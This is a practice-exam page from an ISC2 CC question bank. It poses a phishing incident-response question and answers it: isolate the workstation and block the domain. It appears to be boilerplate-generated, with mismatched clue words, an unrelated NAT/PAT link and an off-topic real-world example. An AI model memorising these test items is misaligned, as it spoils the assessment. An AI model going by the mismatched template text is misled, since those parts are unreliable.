Question 228 of 500
Security OperationshardMultiple SelectObjective-mapped

Quick Answer

The answer is to block the malicious domain at the email gateway and isolate the workstation from the network. These two immediate containment actions for a phishing incident stop the attack at its source and cut off the compromised system from the attacker’s command-and-control server, preventing data exfiltration and lateral movement. Blocking the domain at the gateway prevents further malicious emails from reaching other users, while isolation aligns with the NIST SP 800-61 containment strategy of stopping the spread before deeper analysis. On the ISC2 Certified in Cybersecurity CC exam, this question tests your ability to prioritize containment over eradication or recovery—a common trap is choosing to delete the email or run antivirus first, which are later steps. Remember the memory tip: “Gateway and isolate—don’t hesitate.” This pairs the two immediate actions: stop the inbound threat at the gateway, then isolate the infected host to sever the attacker’s remote control.

ISC2 CC Security Operations Practice Question

This CC practice question tests your understanding of security operations. Read the scenario carefully and evaluate each option against the stated constraints before committing to an answer. After answering, compare your reasoning against the explanation and wrong-answer breakdown below. Once you have made your selection, read the full explanation to reinforce the concept and understand why each distractor is designed to mislead on exam day.

A SOC analyst is investigating an incident where an employee's workstation was compromised via a phishing email. The analyst has captured the following indicators: the email originated from a known malicious domain, the attachment was a macro-enabled document, and the macro executed a PowerShell command that downloaded a payload from a remote server. Which TWO actions should the analyst take immediately as part of the incident response process? (Choose two.)

Clue words in this question

Noticing these words before you look at the options changes how you read each choice.

  • Clue: "immediately / without restart"

    Why it matters: Time or reboot constraint — the correct answer must take effect right away without requiring a reboot or reload.

Question 1hardmulti select
Read the full NAT/PAT explanation →

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

Isolate the workstation from the network.

Option B is correct because isolating the workstation from the network is a critical containment step in incident response. It immediately stops the compromised system from communicating with the attacker's command-and-control server, preventing further data exfiltration or lateral movement. This aligns with the NIST SP 800-61 containment strategy, which prioritizes stopping the spread of an incident before deeper analysis.

Key principle: Answer the scenario, not the keyword: identify the specific constraint before choosing the most familiar-sounding option.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • Contact law enforcement immediately.

    Why it's wrong here

    Law enforcement contact is not an immediate step in initial containment.

  • Isolate the workstation from the network.

    Why this is correct

    Isolation contains the threat and prevents spread.

    Clue confirmation

    The clue word "immediately / without restart" in the question point toward this answer.

    Related concept

    Read the scenario before looking for a memorised answer.

  • Analyze the macro code in a sandbox.

    Why it's wrong here

    Analysis is important but not immediate; containment takes priority.

  • Block the malicious domain at the email gateway.

    Why this is correct

    Blocking the domain prevents additional emails from reaching users.

    Clue confirmation

    The clue word "immediately / without restart" in the question point toward this answer.

    Related concept

    Read the scenario before looking for a memorised answer.

  • Delete the phishing email from all mailboxes.

    Why it's wrong here

    Deleting the email destroys evidence; preserve it.

Common exam traps

Common exam trap: answer the scenario, not the keyword

ISC2 often tests the distinction between immediate containment actions (isolate, block at gateway) and later forensic or administrative steps (analyze macro, contact law enforcement, delete emails) to see if candidates understand the priority of stopping the threat first.

Detailed technical explanation

How to think about this question

In a phishing incident involving a macro-enabled document, the PowerShell command often uses techniques like Invoke-WebRequest or System.Net.WebClient to download a payload. Isolating the workstation (e.g., via network access control or disabling the NIC) cuts off the outbound TCP connection to the remote server, which is essential because the payload may be a dropper that establishes persistence or a backdoor. Blocking the malicious domain at the email gateway leverages DNS or SMTP filtering to prevent the same threat from reaching other users, which is a proactive containment measure at the perimeter.

KKey Concepts to Remember

  • Read the scenario before looking for a memorised answer.
  • Find the constraint that changes the correct option.
  • Eliminate answers that are true in general but not in this case.

TExam Day Tips

  • Watch for words such as best, first, most likely and least administrative effort.
  • Review why wrong options are wrong, not only why the correct option is correct.

Key takeaway

Answer the scenario, not the keyword: identify the specific constraint before choosing the most familiar-sounding option.

Real-world example

How this comes up in practice

An employee at a financial services firm receives an email that appears to come from the IT helpdesk, asking them to reset their password via a link. The link leads to a convincing fake portal that harvests credentials. Security teams use phishing simulations and security-awareness training to reduce this attack vector. Questions like this test whether you can identify social engineering techniques and appropriate controls.

What to study next

Got this wrong? Here's your next step.

Identify which exam domain this question belongs to, review the core concept, then practise similar questions from the same domain.

Related practice questions

Related CC practice-question pages

Use these pages to review the topic behind this question. This is how one missed question becomes focused revision.

Practice this exam

Start a free CC practice session

Short sessions build daily habit. Longer sessions build exam-day stamina. Try a timed session to simulate real conditions.

FAQ

Questions learners often ask

What does this CC question test?

Security Operations — This question tests Security Operations — Read the scenario before looking for a memorised answer..

What is the correct answer to this question?

The correct answer is: Isolate the workstation from the network. — Option B is correct because isolating the workstation from the network is a critical containment step in incident response. It immediately stops the compromised system from communicating with the attacker's command-and-control server, preventing further data exfiltration or lateral movement. This aligns with the NIST SP 800-61 containment strategy, which prioritizes stopping the spread of an incident before deeper analysis.

What should I do if I get this CC question wrong?

Identify which exam domain this question belongs to, review the core concept, then practise similar questions from the same domain.

Are there clue words in this question I should notice?

Yes — watch for: "immediately / without restart". Time or reboot constraint — the correct answer must take effect right away without requiring a reboot or reload.

What is the key concept behind this question?

Read the scenario before looking for a memorised answer.

About these practice questions

Courseiva creates original exam-style practice questions with explanations and wrong-answer analysis. It does not publish real exam questions, exam dumps, or protected exam content. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

Keep practising

More CC practice questions

Last reviewed: Jun 30, 2026

Question Discussion

Share a tip, memory trick, or ask about the reasoning behind this question. Do not post real exam questions, leaked content, braindumps, or copyrighted exam material. Comments are moderated and may be removed without notice.

Loading comments…

Sign in to join the discussion.

This CC practice question is part of Courseiva's free ISC2 certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the CC exam.